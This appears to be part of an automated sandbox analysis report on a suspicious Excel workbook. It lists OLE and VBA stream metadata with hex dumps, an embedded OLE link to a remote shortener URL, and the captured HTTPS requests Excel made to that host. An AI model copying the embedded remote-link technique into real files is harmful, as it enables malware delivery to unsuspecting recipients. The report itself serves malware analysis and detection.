                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00
                Stream Path: MBD006207A6/MBD007203CB/\x5SummaryInformation, File Type: data, Stream Size: 256
                General
                Stream Path:MBD006207A6/MBD007203CB/\x5SummaryInformation
                CLSID:
                File Type:data
                Stream Size:256
                Entropy:4.086306928392587
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c | E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
                Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00
                Stream Path: MBD006207A6/MBD007203CB/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 134792
                General
                Stream Path:MBD006207A6/MBD007203CB/Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:134792
                Entropy:7.974168320310173
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . Z i ^ . m . q l % . w " . x . Z q C b g i ' . h . . # . . . . . . . P . . . \\ . p . . 6 u ! l ( n y I T 5 W { L : 1 J . S . . . . 0 x . 3 . ` . X { ( / z 7 / . 8 x X g X # v . . [ d C y . . s . ] G 9 m . u . . . B . . . R a . . . . . . . = . . . L . . . O . . r 7 . v . . . " . . . . " _ K : . . . . . . . . . j # . . . . K . . . . . . . . = . . . " j ! ; . g . . @ . . . . . . . ^ " . . . 9 . . . . r . . . . . . . 1 . . . : . t . ? e . ) n S P x . b & 1
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 5a 69 5e 2e a6 e0 6d 97 16 71 6c a3 ef b8 25 05 77 88 22 87 ec d8 b3 78 17 a4 5a 71 43 ad a8 c2 62 67 69 b8 d9 e2 27 83 c8 df b8 f6 68 1b 05 23 e1 00 02 00 b0 04 c1 00 02 00 ef 50 e2 00 00 00 5c 00 70 00 13 36 75 21 6c 28 6e bd 95 81 f4 c7 79 fa 49 54 35 99 57 f1 85 8d fb f3 e2 7b 4c b1 ea 3a
                Stream Path: MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 468
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:468
                Entropy:5.269289820125323
                Base64 Encoded:True
                Data ASCII:I D = " { 1 9 C 9 4 3 8 D - F 0 7 5 - 4 2 6 8 - 9 E 6 E - 7 B 8 A E 6 6 D 5 A 0 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " C D C F 3 A 0 A C A D 2 C E D 2 C E D 2 C E D 2 C E " . . D P B = " 9 9 9 B 6 E 9 3 6 F 9
                Data Raw:49 44 3d 22 7b 31 39 43 39 34 33 38 44 2d 46 30 37 35 2d 34 32 36 38 2d 39 45 36 45 2d 37 42 38 41 45 36 36 44 35 41 30 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                Stream Path: MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 83
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:83
                Entropy:3.0672749060249043
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 00 00
                Stream Path: MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2486
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
                CLSID:
                File Type:data
                Stream Size:2486
                Entropy:3.9244127831265385
                Base64 Encoded:False
                Data ASCII:a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
                Data Raw:cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00
                Stream Path: MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 536
                General
                Stream Path:MBD006207A6/MBD007203CB/_VBA_PROJECT_CUR/VBA/dir
                CLSID:
                File Type:data
                Stream Size:536
                Entropy:6.330646364694152
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . C W ] i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 .
                Data Raw:01 14 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 43 57 5d 69 12 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
                Stream Path: MBD006207A6/MBD00726B69/\x1CompObj, File Type: data, Stream Size: 114
                General
                Stream Path:MBD006207A6/MBD00726B69/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:114
                Entropy:4.219515110876372
                Base64 Encoded:False
                Data ASCII:. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/MBD00726B69/Package, File Type: Microsoft Excel 2007+, Stream Size: 26242
                General
                Stream Path:MBD006207A6/MBD00726B69/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:26242
                Entropy:7.635424485665502
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A6/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 283872
                General
                Stream Path:MBD006207A6/Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:283872
                Entropy:7.743278150467805
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                Stream Path: MBD006207A7/\x1CompObj, File Type: data, Stream Size: 99
                General
                Stream Path:MBD006207A7/\x1CompObj
                CLSID:
                File Type:data
                Stream Size:99
                Entropy:3.631242196770981
                Base64 Encoded:False
                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A7/Package, File Type: Microsoft Excel 2007+, Stream Size: 45934
                General
                Stream Path:MBD006207A7/Package
                CLSID:
                File Type:Microsoft Excel 2007+
                Stream Size:45934
                Entropy:7.5587990853484195
                Base64 Encoded:True
                Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                Stream Path: MBD006207A8/\x1Ole, File Type: data, Stream Size: 806
                General
                Stream Path:MBD006207A8/\x1Ole
                CLSID:
                File Type:data
                Stream Size:806
                Entropy:5.102215976650107
                Base64 Encoded:False
                Data ASCII:. . . . A . l - { . . . . . . . . . . . . 2 . . . y . . . K . . . . . h . t . t . p . s . : . / . / . s . . . d . e . e . m . o . s . . . c . o . m . / . q . j . E . 1 . B . c . W . g . ? . & . s . m . o . k . e . = . w . e . a . l . t . h . y . & . c . o . m . m . a . = . a . n . n . o . y . e . d . & . t . a . n . k . f . u . l . = . w . a . c . k . y . & . l . i . t . e . r . a . t . u . r . e . . . P . . S . # c - . " . . : P . H 9 M R 3 7 9 k 6 O o ~ g j . . . , / [ . v [ D " v Z c . 4 5 ~ . @ < J . M
                Data Raw:01 00 00 02 41 8f 02 6c 2d 81 d8 7b 00 00 00 00 00 00 00 00 00 00 00 00 32 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 2e 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 73 00 2e 00 64 00 65 00 65 00 6d 00 6f 00 73 00 2e 00 63 00 6f 00 6d 00 2f 00 71 00 6a 00 45 00 31 00 42 00 63 00 57 00 67 00 3f 00 26 00 73 00 6d 00 6f 00 6b 00 65 00 3d 00 77 00 65 00 61 00
                Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 319988
                General
                Stream Path:Workbook
                CLSID:
                File Type:Applesoft BASIC program data, first line number 16
                Stream Size:319988
                Entropy:7.998590879161447
                Base64 Encoded:True
                Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . l k e " . . T R 7 $ + G . ~ " K e . . 9 # } C _ V . . . . . . . . . M . . . \\ . p . r [ O I U . . w . t n 6 3 q H . . F u . [ 8 . L * V ' 1 ) e > . . . . * \\ . . 2 . 5 y . . . d 7 & . . B . . . a . . . % M . . . = . . . . . . . . * 6 @ . j . N ` . . . . . . . . . . a . . . . 3 . . . . . . . . ; . . . . \\ = . . . P ` d > a [ / . . g [ @ . . . @ . . . k " . . . . ` . . . . F 1 . . . 3 . . . . 1 . . . ) $ . $ r V q ) . E | ; [ v . O & L 0 . 1 . . . . . . 5
                Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 6c b5 ce 6b 65 a6 dc 22 7f 7f 54 52 37 24 2b 47 7f 7e 9e 22 4b 65 0d 13 39 23 7d ac 94 8a ea fc f1 43 8e 85 ba b6 82 5f f6 56 87 2e bc da e4 0a e1 00 02 00 b0 04 c1 00 02 00 8d 4d e2 00 00 00 5c 00 70 00 fa 72 5b 91 4f dc 49 f3 e1 e2 c4 55 8a cb fd 02 19 77 0f a0 74 d2 d5 ff a1 6e da 36 df 33
                Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 527
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECT
                CLSID:
                File Type:ASCII text, with CRLF line terminators
                Stream Size:527
                Entropy:5.254178060321263
                Base64 Encoded:True
                Data ASCII:I D = " { E 1 2 2 2 7 D 7 - 3 F 5 8 - 4 E C 2 - A 9 2 4 - 4 C 8 5 C 1 0 E 7 5 E B } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 1 9 1 B C 7 F D C B F D C B F D C
                Data Raw:49 44 3d 22 7b 45 31 32 32 32 37 44 37 2d 33 46 35 38 2d 34 45 43 32 2d 41 39 32 34 2d 34 43 38 35 43 31 30 45 37 35 45 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
                Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104
                General
                Stream Path:_VBA_PROJECT_CUR/PROJECTwm
                CLSID:
                File Type:data
                Stream Size:104
                Entropy:3.0488640812019017
                Base64 Encoded:False
                Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
                Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

                Network Behavior

                Network Port Distribution

                TCP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 20, 2024 16:11:50.351640940 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:50.351679087 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:50.351757050 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:50.355072021 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:50.355084896 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:52.025154114 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:52.025259018 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:52.029748917 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:52.029767036 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:52.029990911 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:52.030046940 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:52.030396938 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:52.075334072 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:53.100689888 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:53.100760937 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:53.100783110 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:53.101265907 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:53.114664078 CET49730443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:53.114701986 CET4434973014.103.79.10192.168.2.9
                Dec 20, 2024 16:11:53.116308928 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:53.116343975 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:53.116426945 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:53.116695881 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:53.116704941 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:54.797092915 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:54.797262907 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:54.797926903 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:54.797938108 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:54.798156023 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:54.798161983 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:55.542011976 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:55.542113066 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:55.542196035 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:55.542248964 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:55.542263031 CET4434973114.103.79.10192.168.2.9
                Dec 20, 2024 16:11:55.542310953 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:55.543456078 CET49731443192.168.2.914.103.79.10
                Dec 20, 2024 16:11:55.543457031 CET49731443192.168.2.914.103.79.10

                UDP Packets

                TimestampSource PortDest PortSource IPDest IP
                Dec 20, 2024 16:11:49.943598032 CET5694153192.168.2.91.1.1.1
                Dec 20, 2024 16:11:50.350563049 CET53569411.1.1.1192.168.2.9

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Dec 20, 2024 16:11:49.943598032 CET192.168.2.91.1.1.10x6335Standard query (0)s.deemos.comA (IP address)IN (0x0001)false

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Dec 20, 2024 16:11:50.350563049 CET1.1.1.1192.168.2.90x6335No error (0)s.deemos.com14.103.79.10A (IP address)IN (0x0001)false
                Dec 20, 2024 16:12:01.336961031 CET1.1.1.1192.168.2.90xb849No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                Dec 20, 2024 16:12:01.336961031 CET1.1.1.1192.168.2.90xb849No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false

                HTTP Request Dependency Graph

                • s.deemos.com

                HTTPS Proxied Packets

                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                0192.168.2.94973014.103.79.104433636C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                2024-12-20 15:11:52 UTC252OUTGET /qjE1BcWg?&smoke=wealthy&comma=annoyed&tankful=wacky&literature HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: s.deemos.com
                Connection: Keep-Alive
                2024-12-20 15:11:53 UTC397INHTTP/1.1 301 Moved Permanently
                Date: Fri, 20 Dec 2024 15:11:52 GMT
                Content-Type: text/plain; charset=utf-8
                Content-Length: 38
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15724800; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                Location: /404
                Vary: Accept
                2024-12-20 15:11:53 UTC38INData Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 2f 34 30 34
                Data Ascii: Moved Permanently. Redirecting to /404


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.94973114.103.79.104433636C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                TimestampBytes transferredDirectionData
                2024-12-20 15:11:54 UTC193OUTGET /404 HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                Host: s.deemos.com
                Connection: Keep-Alive
                2024-12-20 15:11:55 UTC448INHTTP/1.1 404 Not Found
                Date: Fri, 20 Dec 2024 15:11:55 GMT
                Content-Type: text/html; charset=utf-8
                Content-Length: 4645
                Connection: close
                X-DNS-Prefetch-Control: off
                X-Frame-Options: SAMEORIGIN
                Strict-Transport-Security: max-age=15724800; includeSubDomains
                X-Download-Options: noopen
                X-Content-Type-Options: nosniff
                X-XSS-Protection: 1; mode=block
                X-Powered-By: Next.js
                ETag: "1225-4lR+8o8+z0M1Iq6OMuNgxAtPjT8"
                Vary: Accept-Encoding
                2024-12-20 15:11:55 UTC3620INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 53 65 74 3d 22 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 76 69 65 77 70 6f 72 74 2d 66 69 74 3d 63 6f 76 65 72 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 75 6e 64 65 66 69 6e 65 64 20 69 73 20 61 20 66 72 65 65 20 61 6e 64 20 6f 70 65 6e 20 73 6f 75 72 63 65 20 55 52 4c 20 73 68 6f 72 74 65 6e 65 72 20 77 69 74 68 20 63 75 73 74 6f 6d 20 64 6f 6d 61 69 6e 73 20 61 6e
                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charSet="utf-8"/><meta name="viewport" content="width=device-width, initial-scale=1, viewport-fit=cover"/><meta name="description" content="undefined is a free and open source URL shortener with custom domains an
